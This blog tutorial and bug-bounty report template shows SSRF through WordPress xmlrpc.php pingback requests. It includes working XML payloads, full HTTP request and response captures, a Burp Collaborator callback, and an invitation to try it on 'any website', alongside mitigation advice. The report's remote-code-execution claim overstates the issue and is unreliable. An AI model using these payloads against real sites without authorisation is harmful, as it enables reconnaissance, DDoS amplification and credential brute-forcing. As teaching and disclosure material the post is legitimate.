XMLRPC Attack leads to SSRF (SSRF via XMLRPC)

-

In this Article ?

  • What is XMLRPC Attack ?
  • What is SSRF Attack ?
  • SSRF via XMLRPC 
  • How to Perform SSRF via XMLRPC ? 
  • Reporting
  • Impact
  • Mitigation

What is XMLRPC Attack ?

XML-RPC is a simple and widely supported protocol that has been used in various applications, such as web services, blogging platforms, content management systems, and remote administration of software systems. It provides a standardized way for different software components to interact and exchange data in a cross-platform manner.

If an XML-RPC implementation is vulnerable to remote code execution, an attacker can send specially crafted XML-RPC requests to execute arbitrary code on the server. This can lead to unauthorized access, data breaches, or further exploitation of the system.

What is SSRF Attack ?
A Server-Side Request Forgery (SSRF) attack is a type of security vulnerability that occurs when an attacker is able to manipulate a web application into making unintended requests to internal or external resources on behalf of the server. This attack can be particularly dangerous when it targets a search engine.

The consequences of an SSRF attack on a search engine can vary depending on the server's configuration and the nature of the requests. Here are a few possible scenarios.

SSRF via XMLRPC Attack ?
SSRF (Server-Side Request Forgery) via XML-RPC attack is a specific type of attack that leverages XML-RPC functionality to perform SSRF vulnerabilities. SSRF occurs when an attacker can make a targeted server initiate requests to other internal or external resources on behalf of the server itself. By exploiting SSRF through XML-RPC, an attacker can potentially gain unauthorized access to sensitive data, perform port scanning, or launch attacks against internal systems.

How To Perform SSRF via XMLRPC ?
STEP #1: visit any website put the xmlrpc.php at end of website URL. Then you will get "XML-RPC server accepts POST requests only" like this.

STEP #2: Take the request of the vulnerable URL in your Burp Suite. Send the request to the repeater in the burp suite. Then change the request method from Get to Post. 

STEP #3: Put first XML-RPC exploit method. then you will get the system list method.
                    <methodCall>
                    <methodName>system.listMethods</methodName>
                    <params></params>
                    </methodCall>
you can attack any of these.

STEP #4: I will able to perform Server-Side Request Forgery (SSRF) attacks via the xmlrpc.php file. Now Paste second XML-RPC exploit methods.

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>Paste the burp collaborator link</string></value>
</param>
<param>
<value><string>Enter the website name</string></value>
</param>
</params>
</methodCall>

STEP #5: Now poll on Burp Collaborator page of Burp Suite, you will get DNS IP which any attacker will scan and find famous open hacking port.
The attacker can exploit the SSRF vulnerability to gather sensitive information, escalate the attack to gain unauthorized access to internal systems, or pivot to further attack the network infrastructure.

Impact:
SSRF attacks can enable an attacker to scan internal networks or external systems accessible by the server. By requesting URLs that correspond to internal IP addresses or other external targets, the attacker can perform network reconnaissance, identify open ports, or search for additional vulnerabilities to exploit.

If the attacker can pivot from SSRF to other internal systems through the compromised server, they may gain unauthorized access to critical resources. This could involve accessing additional servers, databases, or administrative panels. Unauthorized access can lead to further data breaches, manipulation of system configurations, or privilege escalation attacks.

Mitigation:
Mitigating SSRF (Server-Side Request Forgery) attacks via XML-RPC involves implementing various security measures to prevent unauthorized access and protect sensitive resources :

1. Use URL filtering techniques to block requests to internal or sensitive resources. Maintain a blacklist of known malicious URLs or internal-only resources that should never be accessed via XML-RPC. Block or sanitize requests that match the blacklist.
2. Implement strict input validation on XML-RPC requests to ensure that only valid and expected URLs are allowed. Validate the URL parameter to prevent the use of internal or malicious addresses. Additionally, maintain a whitelist of trusted external resources that the server is allowed to access via XML-RPC requests.
3. Ensure that the XML-RPC-enabled server operates with the principle of least privilege. Restrict the server's access rights to only the necessary resources and functionalities required for its operation. Avoid granting unnecessary permissions or elevated privileges that could be abused in an SSRF attack.

                        How to Report ?
Hello Team
                 I'm Career Technology Cyber security India a white security researcher from mumbai INDIA, founded a vulnerability on your website

Vulnerability Name: XML-RPC & SSRF via XMLRPC 

Descriptions  :
“XML-RPC” also refers generically to the use of XML for a remote procedure call, independently of the specific protocol. XML-RPC for PHP is affected by a remote code-injection vulnerability. An attacker may exploit this issue to execute arbitrary commands or code in the context of the web server.

Vulnerable URL: https://exmple.com/xmlrpc.php

Steps to Reproduce :
1.Go to the website : https://exmple.com
2.Put the xmlrpc.php at end of your website URL
3.Take the request of the vulnerable URL in your Burp Suite 
4.Send the request to the repeater in the burp suite
5 .Then change the request method from Get to Post 
6.Put first XML-RPC exploit method   

<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Post Request:
POST /xmlrpc.php HTTP/2
Host: exmple.com
Cookie: electro_wc_recently_viewed=5395
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Dnt: 1
Sec-Gpc: 1
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

Response:
HTTP/2 200 OK
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Date: Mon, 12 Jun 2023 08:41:22 GMT
Vary: Accept-Encoding
Host-Header: c2hhcmVkLmJsdWVob3NOLmNVaQ==
X-Endurance-Cache-Level: 1
X-Nginx-Cache: WordPress
Content-Length: 4273
Content-Type: text/xml; charset=UTF-8
Server: Apache

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <params>
    <param>
      <value>
      <array><data>
  <value><string>system.multicall</string></value>
  <value><string>system.listMethods</string></value>
  <value><string>system.getCapabilities</string></value>
  <value><string>demo.addTwoNumbers</string></value>
  <value><string>demo.sayHello</string></value>
  <value><string>pingback.extensions.getPingbacks</string></value>
  <value><string>pingback.ping</string></value>
  <value><string>mt.publishPost</string></value>
  <value><string>mt.getTrackbackPings</string></value>
  <value><string>mt.supportedTextFilters</string></value>
  <value><string>mt.supportedMethods</string></value>
  <value><string>mt.setPostCategories</string></value>
  <value><string>mt.getPostCategories</string></value>
  <value><string>mt.getRecentPostTitles</string></value>
  <value><string>mt.getCategoryList</string></value>
  <value><string>metaWeblog.getUsersBlogs</string></value>
  <value><string>metaWeblog.deletePost</string></value>
  <value><string>metaWeblog.newMediaObject</string></value>
  <value><string>metaWeblog.getCategories</string></value>
  <value><string>metaWeblog.getRecentPosts</string></value>
  <value><string>metaWeblog.getPost</string></value>
  <value><string>metaWeblog.editPost</string></value>
  <value><string>metaWeblog.newPost</string></value>
  <value><string>blogger.deletePost</string></value>
  <value><string>blogger.editPost</string></value>
  <value><string>blogger.newPost</string></value>
  <value><string>blogger.getRecentPosts</string></value>
  <value><string>blogger.getPost</string></value>
  <value><string>blogger.getUserInfo</string></value>
  <value><string>blogger.getUsersBlogs</string></value>
  <value><string>wp.restoreRevision</string></value>
  <value><string>wp.getRevisions</string></value>
  <value><string>wp.getPostTypes</string></value>
  <value><string>wp.getPostType</string></value>
  <value><string>wp.getPostFormats</string></value>
  <value><string>wp.getMediaLibrary</string></value>
  <value><string>wp.getMediaItem</string></value>
  <value><string>wp.getCommentStatusList</string></value>
  <value><string>wp.newComment</string></value>
  <value><string>wp.editComment</string></value>
  <value><string>wp.deleteComment</string></value>
  <value><string>wp.getComments</string></value>
  <value><string>wp.getComment</string></value>
  <value><string>wp.setOptions</string></value>
  <value><string>wp.getOptions</string></value>
  <value><string>wp.getPageTemplates</string></value>
  <value><string>wp.getPageStatusList</string></value>
  <value><string>wp.getPostStatusList</string></value>
  <value><string>wp.getCommentCount</string></value>
  <value><string>wp.deleteFile</string></value>
  <value><string>wp.uploadFile</string></value>
  <value><string>wp.suggestCategories</string></value>
  <value><string>wp.deleteCategory</string></value>
  <value><string>wp.newCategory</string></value>
  <value><string>wp.getTags</string></value>
  <value><string>wp.getCategories</string></value>
  <value><string>wp.getAuthors</string></value>
  <value><string>wp.getPageList</string></value>
  <value><string>wp.editPage</string></value>
  <value><string>wp.deletePage</string></value>
  <value><string>wp.newPage</string></value>
  <value><string>wp.getPages</string></value>
  <value><string>wp.getPage</string></value>
  <value><string>wp.editProfile</string></value>
  <value><string>wp.getProfile</string></value>
  <value><string>wp.getUsers</string></value>
  <value><string>wp.getUser</string></value>
  <value><string>wp.getTaxonomies</string></value>
  <value><string>wp.getTaxonomy</string></value>
  <value><string>wp.getTerms</string></value>
  <value><string>wp.getTerm</string></value>
  <value><string>wp.deleteTerm</string></value>
  <value><string>wp.editTerm</string></value>
  <value><string>wp.newTerm</string></value>
  <value><string>wp.getPosts</string></value>
  <value><string>wp.getPost</string></value>
  <value><string>wp.deletePost</string></value>
  <value><string>wp.editPost</string></value>
  <value><string>wp.newPost</string></value>
  <value><string>wp.getUsersBlogs</string></value>
</data></array>
      </value>
    </param>
  </params>
</methodResponse>

7.  I was able to perform Server-Side Request Forgery (SSRF) attacks via the xmlrpc.php file 

Post Request:
POST /xmlrpc.php HTTP/2
Host: exmple.com
Cookie: electro_wc_recently_viewed=5395
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Dnt: 1
Sec-Gpc: 1
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 265

<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value><string>http://s4xi0a4xhtoh4sxjsev7eqlpfgl69v.oastify.com</string></value>
</param>
<param>
<value><string>https://exmple.com</string></value>
</param>
</params>
</methodCall>


Response:
  HTTP/2 200 OK
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Date: Mon, 12 Jun 2023 08:59:35 GMT
Vary: Accept-Encoding
Host-Header: c2hhcmVkLmJsdWVob3N0LmNVaQ==
X-Endurance-Cache-Level: 1
X-Nginx-Cache: WordPress
Content-Length: 370
Content-Type: text/xml; charset=UTF-8
Server: Apache

<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
  <fault>
    <value>
      <struct>
        <member>
          <name>faultCode</name>
          <value><int>0</int></value>
        </member>
        <member>
          <name>faultString</name>
          <value><string></string></value>
        </member>
      </struct>
    </value>
  </fault>
</methodResponse>

Impact:
1)This can be automated from multiple hosts and be used to cause a mass DDOS attack on the victim. 
2) This method is also used for brute force attacks to stealing the admin credentials and other important credentials

Plus, there are a lot of PoCs lying around the web concerning the vulnerabilities associated with XMLRPC.php in WordPress websites.

XML-RPC pingbacks attacks :
In this case, an attacker is able to leverage the default XML-RPC API in order to perform callbacks for the following purposes:

Distributed denial-of-service (DDoS) attacks - An attacker executes the pingback.ping the method from several affected WordPress installations against a single unprotected target (botnet level).

XSPA (Cross Site Port Attack) - An attacker can execute the pingback.ping method from a single affected WordPress installation to the same host (or other internal/private host) on different ports. An open port or an internal host can be determined by observing the difference in time of response and/or by looking at the response of the request.

Supporting Material/References:
1) https://nitesculucian.github.io/2019/07/01/exploiting-the-xmlrpc-php-on-all-wordpress-versions/ 
2) https://blog.sucuri.net/2015/10/brute-force-amplification-attacks-against-wordpress-xmlrpc.html 
3) https://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html

How do I block XML-RPC?
Method 1 - Plugin
1. Log into your WordPress Admin Dashboard.
2. Click on Plugins >> Add New.
3. Search for "Disable XML-RPC" and install the Disable XML-RPC plugin.
4. Simply activate the plugin, and that's it! XML-RPC should be disabled.
5. You can recheck using the XML-RPC Validator.

PFA of screenshots for steps by steps guidance also help to regenerate the Vulnerability

Thanks & Regard,
Career Technology Cyber security India
Indian Bug Hunter

Comments

Post a Comment

Popular posts from this blog

CAREER TECHNOLOGY CYBER SECURITY INDIA PVT LTD.

-
Image
CAREER TECHNOLOGY CYBER SECURITY INDIA PVT  LTD. ISO 27001:2013, ISO 9001:2015 Certified  Company         INTERNATIONALLY AUTHORISED FOR CYBER FORENSICS, CYBER SECURITY, CYBER AUDIT TRAINING & EXAM CENTER BY MILE2 CYBER SECURITY United States First ATC of Mile 2 Cyber Security in Mumbai & MIRA-BHAYANDER / VASAI-VIRAR, Since JAN 2017. Offline as well as Online batches both are available. PG accommodation for students is available. Joi n   CAREER TECHNOLOGY CYBER SE CURITY INDIA  PVT LTD.   Today  To Start Your  Career In  Cyber Security. * OUR PROFESSIONAL DIPLOMA COURSES FOR  ALL  UNDERGRADUATE ,    GRADUATE ,  AND  WORKING PROFESSIONALS* __ ______________________________________________________________________ Why do you have to choose our institute? 1. Our Diploma is Authorised by the Indian Government as well as its full copyright & Trademark by ISO. IT will help you to add Extra Technical Skills in     Your Resume. Its Contains Full Practicals Knowledge from the In
Read more

Cyber Security Audits

-
Image
 Cyber Security Audits What is Cyber Security Audit?                 A cyber audit, at its core, refers to a systematic evaluation and assessment of an organization's information systems. This evaluation is designed to identify potential vulnerabilities, non-compliance with standards, and areas of improvement in both technology and processes, all with the aim of safeguarding digital assets against potential threats. Cyber audits delve deeply into the organization's technological infrastructure, scrutinizing hardware, software, networks, and even the practices and protocols that users and administrators follow. This in-depth review allows for a holistic understanding of the current cybersecurity posture of the entity and helps in crafting more robust and resilient digital environments. The rationale behind conducting a cyber audit often stems from both internal and external pressures. Internally, management recognizes the intrinsic value of their digital assets, understanding th
Read more

Some Dark web Links

-
Image
Here are some of the Forum/Website to visit on dark web related to cybersecurity and hacking. Before visiting this website please follow the steps to be safe on the dark web/ Deepweb. Security Steps to be taken before opening the links: First of All, To browse these dark web forums, first close all active programs and applications in your computer then start Your NordVPN or any Paid and HQ VPN that have TOR service and select Onion Over VPN Server.  Now start Tor Browser and disable Javascript. In this way, you have created a completely secure and untraceable environment for you. If you think Tor Browser gives you full anonymity then you are wrong.  Only premium VPN services can provide you fully secure and untraceable environment. I have tried my hands on many premium VPN services, and I found NordVPN beats its competitor in all features. Disclaimer ⚠ : This info are shared for educational purpose only, neither the website nor creator hold any info or liable to any
Read more